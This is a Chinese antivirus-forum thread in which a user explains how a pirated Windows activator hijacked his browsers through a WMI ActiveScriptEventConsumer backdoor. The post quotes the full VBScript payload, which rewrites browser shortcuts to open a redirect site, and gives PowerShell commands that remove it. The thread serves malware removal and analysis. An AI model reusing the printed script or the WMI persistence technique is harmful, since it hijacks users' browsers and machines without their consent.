查看: 11101|回复: 42
收起左侧

[交流探讨] hao123可恶

  [复制链接]
studycpp
发表于 2016-12-22 18:16:47 | 显示全部楼层 |阅读模式
本帖最后由 studycpp 于 2016-12-22 23:16 编辑

不是卡巴斯基的问题

装了Win10, 要激活, 于是网上下载了一个所谓的小马KMS10激活
没想到中招了, 结果浏览器总是被加小尾巴跳转到hao123

系统目录的KMS10文件夹删除了, 注册表搜索删除了. 快捷方式手动清理干净了, 添加的二个计划任务也删除了
可是没用啊
没用啊, 怎么办... Explorer进程加载的DLL 系统服务, 观察一圈没发现异常啊.  网上百度, Google好多圈
一点用也没, 都是些抄来抄去的贴子.  重装系统, 这不符合我的风格呀(其实是软件太多, 重装太麻烦)


于是装了一个HIPS, 发现原来是


scrcons.exe 他在修改快捷方式. 于是百度之, 引出来WMI, 仔细一看, 乖乖, 三无后门
(“三无”后门的核心就是WMI中的永久事件消费者ActiveScriptEventConsumer)


于是网上下载了一个工具WIMExplorer 这里贴个下载地址 http://www.ks-soft.net/hostmon.eng/wmi/
一看 ActiveScriptEventConsumer 里面果然有一个vbs脚本再一看内容, 这不正是查找多日的小尾巴吗, 果断删除
从此世界清静了

下面大家看看小马的脚本
[vb] view plain copy

On Error Resume Next  
Const link = "http://hao.qquu8.com/?v=108&m=yx"  
Const link360 = "http://hao.qquu8.com/?v=108&m=yx&s=3"  
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"  
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"  
browsersArr = Split(browsers,",")  
Set oDic = CreateObject("scripting.dictionary")  
For Each browser In browsersArr  
    oDic.Add LCase(browser), browser  
Next  
lnkpathsArr = Split(lnkpaths,",")  
Set oFolders = CreateObject("scripting.dictionary")  
For Each lnkpath In lnkpathsArr  
    oFolders.Add lnkpath, lnkpath  
Next  
Set fso = CreateObject("Scripting.Filesystemobject")  
Set WshShell = CreateObject("Wscript.Shell")  
For Each oFolder In oFolders  
    If fso.FolderExists(oFolder) Then  
        For Each file In fso.GetFolder(oFolder).Files  
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then  
                Set oShellLink = WshShell.CreateShortcut(file.Path)  
                path = oShellLink.TargetPath  
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)  
                If oDic.Exists(LCase(name)) Then  
                    If LCase(name) = LCase("360se.exe") Then  
                        oShellLink.Arguments = link360  
                    Else  
                        oShellLink.Arguments = link  
                    End If  
                    If file.Attributes And 1 Then  
                        file.Attributes = file.Attributes - 1  
                    End If  
                    oShellLink.Save  
                End If  
            End If  
        Next  
    End If  
Next  


删除方法如下:以管理员身份运行PowerShell
执行以下命令

gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject
pal家族
发表于 2016-12-22 19:32:40 | 显示全部楼层
我的内心毫无波动
甚至还想笑
dongwenqi
发表于 2016-12-22 19:43:47 | 显示全部楼层
看到主题,我觉得很好笑,卡巴斯基神马时候强制捆绑主页了
DF快递
发表于 2016-12-22 21:53:48 | 显示全部楼层
见过捆绑主页的就只有小a了,强制改成 avastSerach
不过在ie设置里面很容易改回来
lf111000lf
发表于 2016-12-22 21:55:25 | 显示全部楼层
我的也是不知道被什么改成hao123了  神奇的是我用360TS 查杀出来了;    尴尬的是我用的是卡巴斯基
ashuro
发表于 2016-12-22 22:16:15 | 显示全部楼层
和卡巴免费版无关……
FUZE
发表于 2016-12-23 00:14:33 | 显示全部楼层
某宝20RMB弄个激活码的事
菈菈
发表于 2016-12-23 01:08:24 | 显示全部楼层
小馬KMS有出10?  
我記得早不做了吧?
linzh
发表于 2016-12-23 02:50:15 | 显示全部楼层
卡巴斯基不杀流氓
heavencc
发表于 2016-12-23 07:49:00 | 显示全部楼层
激活什么的一来推荐买正版,二来若不的话,去用亦是美的KMS,以前用win8.1时用它激活过,一点都不流氓~
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 19:03 , Processed in 0.126653 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表